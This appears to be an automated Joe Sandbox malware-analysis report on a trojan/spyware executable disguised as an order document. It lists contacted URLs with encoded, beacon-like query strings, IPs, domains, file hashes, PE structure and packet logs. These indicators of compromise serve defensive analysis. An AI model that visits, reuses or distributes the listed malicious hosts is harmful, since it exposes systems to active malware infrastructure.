            http://www.ad14.fun/oc7s/?Y6vp=3PLd8j&OdjTHtuX=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://www.hondamechanic.today/pv57/?OdjTHtuX=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Y6vp=3PLd8j0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            https://img.sedoparking.com/templates/images/hero_nc.svg0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/0%Avira URL Cloudsafe
            http://www.ad14.fun/oc7s/0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/s0j2/0%Avira URL Cloudsafe
            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
                                                      https://img.sedoparking.com/templates/images/hero_nc.svgcompact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixcompact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.74.211
                                                      ghs.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      144.208.124.10
                                                      superunicornpalace.comUnited States
                                                      395092SHOCK-1USfalse
                                                      64.190.62.22
                                                      www.hondamechanic.todayUnited States
                                                      11696NBS11696USfalse
                                                      203.161.49.220
                                                      www.hellokong.xyzMalaysia
                                                      45899VNPT-AS-VNVNPTCorpVNtrue
                                                      208.91.197.13
                                                      www.mengistiebethlehem.comVirgin Islands (BRITISH)
                                                      40034CONFLUENCE-NETWORK-INCVGfalse
                                                      91.195.240.19
                                                      parkingpage.namecheap.comGermany
                                                      47846SEDO-ASDEfalse
                                                      162.43.101.114
                                                      www.tedjp-x.comUnited States
                                                      11333CYBERTRAILSUSfalse
                                                      217.160.0.84
                                                      www.architect-usschool.comGermany
                                                      8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                      89.31.76.10
                                                      sitestudio.itItaly
                                                      24994GENESYS-ASITfalse
                                                      188.114.96.3
                                                      www.ad14.funEuropean Union
                                                      13335CLOUDFLARENETUSfalse
                                                      45.113.122.18
                                                      3cubesinterior.inIndia
                                                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                      192.185.208.8
                                                      epicbazaarhub.comUnited States
                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                      121.254.178.230
                                                      www.rz6grmvv.shopKorea Republic of
                                                      3786LGDACOMLGDACOMCorporationKRfalse
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467083
Start date and time: 2024-07-03 17:54:53 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@15/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 153
• Number of non-executed functions: 307
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target EUSOiCcoIEEJJ.exe, PID 2084 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
Time      Type             Description
11:55:42  API Interceptor  1x Sleep call for process: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe modified
11:55:44  API Interceptor  10x Sleep call for process: powershell.exe modified
11:56:58  API Interceptor  10192656x Sleep call for process: compact.exe modified
Process: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1172
                                                      Entropy (8bit):5.3550249375369265
                                                      Encrypted:false
                                                      SSDEEP:24:3OWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:eWSU4xympjms4RIoU99tK8NDv
                                                      MD5:F5C607E507119C024A8457EB53A4EACA
                                                      SHA1:E12BA3AFFE22D4699D53BBBFB38281EB20C79523
                                                      SHA-256:B5C5E419F4854F669A4DF47860787886BC46FAC9C6DC97E39A9F118E79F55AEF
                                                      SHA-512:1FA5B1E2F4850B41ED89237D6A2A5FBB7A04101B21362F118D39A4C9891F00F605AA49651DD1B5B37CFA954BD7A08A53F00F7ECAE4966ADA2207AD2DF995B597
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\compact.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.950153009948546
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
                                                      File size:990'720 bytes
                                                      MD5:7c33fb31e0b8302eba116a02e649200b
                                                      SHA1:b8cf4b26acf2cfb9f48ccc49a05b308425cbbd07
                                                      SHA256:b250139ddfe1f4e0849357b17563dcd09d2dc82f69730c7e5e3797148b47ce16
                                                      SHA512:5522c1304b859f40f747d39736cce33af44f21e42534bd95fdd16d0e58ed56dc2adeee933e2f2e02b3370b30ede5825e01ed5934abce6a87ce6cf2193b206a9c
                                                      SSDEEP:24576:h+Z8mj85+Kz5IY/0zChxWmtydHaGaqaRdPWm:hS89l51SChgRHDaRN
                                                      TLSH:422523225B72DB62C97957F085B5028003B2FD2A51F2DB0E5E9AB0FB5A733604952F37
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xt...............0......f......^.... ........@.. ....................................@................................
                                                      Icon Hash:66666667e69c310e
                                                      Entrypoint:0x4ed45e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xB57478D9 [Mon Jun 21 01:26:49 2066 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xed40b | 0x4f | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xee000 | 0x6400 | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf6000 | 0xc | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0xeb6e8 | 0x70 | .text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      .text | 0x2000 | 0xeb464 | 0xeb600 | cb6c31293cf9777191e31acae73fd4f3 | False | 0.9721282942777483 | data | 7.977348206861711 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc | 0xee000 | 0x6400 | 0x6400 | 911fec29080872002614227f4a6ee64e | False | 0.395625 | data | 5.148123427555753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc | 0xf6000 | 0xc | 0x200 | 08484031a30739359114958f3aeec9ea | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                      RT_ICON | 0xee1e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2701612903225806
                                                      RT_ICON | 0xee4d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.4966216216216216
                                                      RT_ICON | 0xee610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5439765458422174
                                                      RT_ICON | 0xef4c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.6656137184115524
                                                      RT_ICON | 0xefd80 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5021676300578035
                                                      RT_ICON | 0xf02f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3157676348547718
                                                      RT_ICON | 0xf28b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4090056285178236
                                                      RT_ICON | 0xf3968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5859929078014184
                                                      RT_GROUP_ICON | 0xf3de0 | 0x76 | data | | | 0.6440677966101694
                                                      RT_VERSION | 0xf3e68 | 0x398 | OpenPGP Public Key | | | 0.4206521739130435
                                                      RT_MANIFEST | 0xf4210 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                      DLL | Import
                                                      mscoree.dll | _CorExeMain
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Jul 3, 2024 17:56:59.624655962 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.624742031 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.624881029 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.624893904 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.624933004 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.724998951 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725069046 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725080967 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725126982 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.725723982 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725737095 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725748062 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.725841999 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.725873947 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.726675987 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.726691008 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.726701021 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.726712942 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.726739883 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.726761103 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.727813959 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.727828026 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.727838039 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.727849007 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.727931023 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.728827000 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.728840113 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.728849888 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.728863001 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.728899956 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.728920937 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.729677916 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.729691029 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.729701042 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.729716063 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:56:59.729736090 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.729772091 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.734457016 CEST4973080192.168.2.6208.91.197.13
                                                      Jul 3, 2024 17:56:59.739940882 CEST8049730208.91.197.13192.168.2.6
                                                      Jul 3, 2024 17:57:04.771686077 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:04.776622057 CEST8049732188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:04.776717901 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:04.778712034 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:04.784091949 CEST8049732188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:05.459671974 CEST8049732188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:05.459770918 CEST8049732188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:05.459831953 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:05.460706949 CEST8049732188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:05.460762024 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:06.294821978 CEST4973280192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:07.313503027 CEST4973380192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:07.318878889 CEST8049733188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:07.318996906 CEST4973380192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:07.320935965 CEST4973380192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:07.330527067 CEST8049733188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:08.029764891 CEST8049733188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:08.030229092 CEST8049733188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:08.030242920 CEST8049733188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:08.030325890 CEST4973380192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:08.826195002 CEST4973380192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:09.875799894 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:09.880956888 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:09.881091118 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:09.883012056 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:09.888204098 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:09.890656948 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:10.562294960 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:10.562347889 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:10.562408924 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:10.563590050 CEST8049734188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:10.563663006 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:11.388570070 CEST4973480192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:12.407744884 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:12.412698984 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:12.412812948 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:12.414638996 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:12.419589043 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:13.148091078 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:13.148113966 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:13.148125887 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:13.148443937 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:13.151417017 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:13.151520014 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:13.152503014 CEST4973580192.168.2.6188.114.96.3
                                                      Jul 3, 2024 17:57:13.157644987 CEST8049735188.114.96.3192.168.2.6
                                                      Jul 3, 2024 17:57:18.684837103 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:18.690500975 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:18.690599918 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:18.692681074 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:18.700356960 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343360901 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343381882 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343391895 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343441010 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.343728065 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343739986 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343750000 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343760967 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.343769073 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.343807936 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.344332933 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.344356060 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.344366074 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.344372034 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.344398022 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.348368883 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.348395109 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.348443985 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:19.430016041 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.433159113 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.433176041 CEST8049736192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:19.433257103 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:20.201354027 CEST4973680192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:21.220535994 CEST4973780192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:21.225474119 CEST8049737192.185.208.8192.168.2.6
                                                      Jul 3, 2024 17:57:21.225583076 CEST4973780192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:21.227663994 CEST4973780192.168.2.6192.185.208.8
                                                      Jul 3, 2024 17:57:21.232467890 CEST8049737192.185.208.8192.168.2.6
